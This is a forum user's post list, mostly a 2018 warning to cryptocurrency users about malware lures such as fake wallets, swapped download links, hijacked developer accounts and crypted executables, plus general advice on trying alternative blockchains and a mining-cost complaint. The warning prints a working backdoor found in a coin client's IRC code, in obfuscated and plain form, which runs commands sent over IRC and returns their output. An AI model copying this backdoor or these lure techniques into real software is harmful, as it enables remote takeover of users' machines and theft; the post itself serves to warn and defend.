Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Topics - taera249

Pages: 1 2 3 [4]
46
News / Beware of Increasingly Sophisticated Malware Infection Attempts
« on: January 24, 2018, 05:57:02 pm »
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
   CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
   if (buf) {
      std::string result = "";
      while (!feof(buf))
         if (fgets(pszName, sizeof(pszName), buf) != NULL)
            result += pszName;
      CFree(buf);
      strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
      if (strchr(pszName, '!'))
         *strchr(pszName, '!') = '\0';
      Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
   }
}

here is the source code with macros resolved:
Code:

if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
   FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
   if (buf) {
      std::string result = "";
      while (!feof(buf))
         if (fgets(pszName, sizeof(pszName), buf) != NULL)
            result += pszName;
      pclose(buf);
      strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
      if (strchr(pszName, '!'))
         *strchr(pszName, '!') = '\0';
      Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
   }
}

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
   
It is pitch black. You are likely to be eaten by a grue.

Tired of annoying signature ads? Ad block for signatures

47
News / Alternative Block Chains : be safe!
« on: January 24, 2018, 05:54:56 pm »
I haven't seen anybody post about what would be my biggest worry if I were trying out alternative block chains. I realize this may be perceived as "Gavin is FUD'ding anything that isn't bitcoin!"  (FUD == Fear, Uncertainty and Doubt)  But I think some of you might be forgetting some basic computer security fundamentals in the excitement to be early adopters.

When I first heard about bitcoin, my questions were:

1) Can it possibly work (do the ideas for how it works make sense)?
2) Is it a scam?
3) If it is not a scam, could it open my computer up to viruses/trojans if I run it?

I answered those questions by:

1) Reading and understanding Satoshi's whitepaper.  Then thinking about it for a day or two and reading it again.
2) Finding out everything I could about the project.  I read every forum thread here (there were probably under a hundred threads back then) and read Satoshi's initial postings on the crypto mailing list.
3) Downloaded and skimmed the source code to see if it looked vulnerable to buffer overflow or other remotely exploitable attacks.

If I were going to experiment with an alternative block-chain, I'd go through the same process again. But I'm an old conservative fuddy-duddy.

If you want to take a risk on a brand-new alternative block-chain, I'd strongly suggest that you:

1) Run the software in a virtual machine or on a machine that doesn't contain anything valuable.
2) Don't invest more money or time than you can afford to lose.
3) Use a different passphrase at every exchange site.

48
How can a miner get mining in 2018? Prices are just to high

It would take 10 months just to make your money back. And then you start to see profit



My 1 1070 can only pull in maybe $5 a day it would take me 7-8 months before I paid it back and made money...

Smart investment? How are people paying these prices?

Pages: 1 2 3 [4]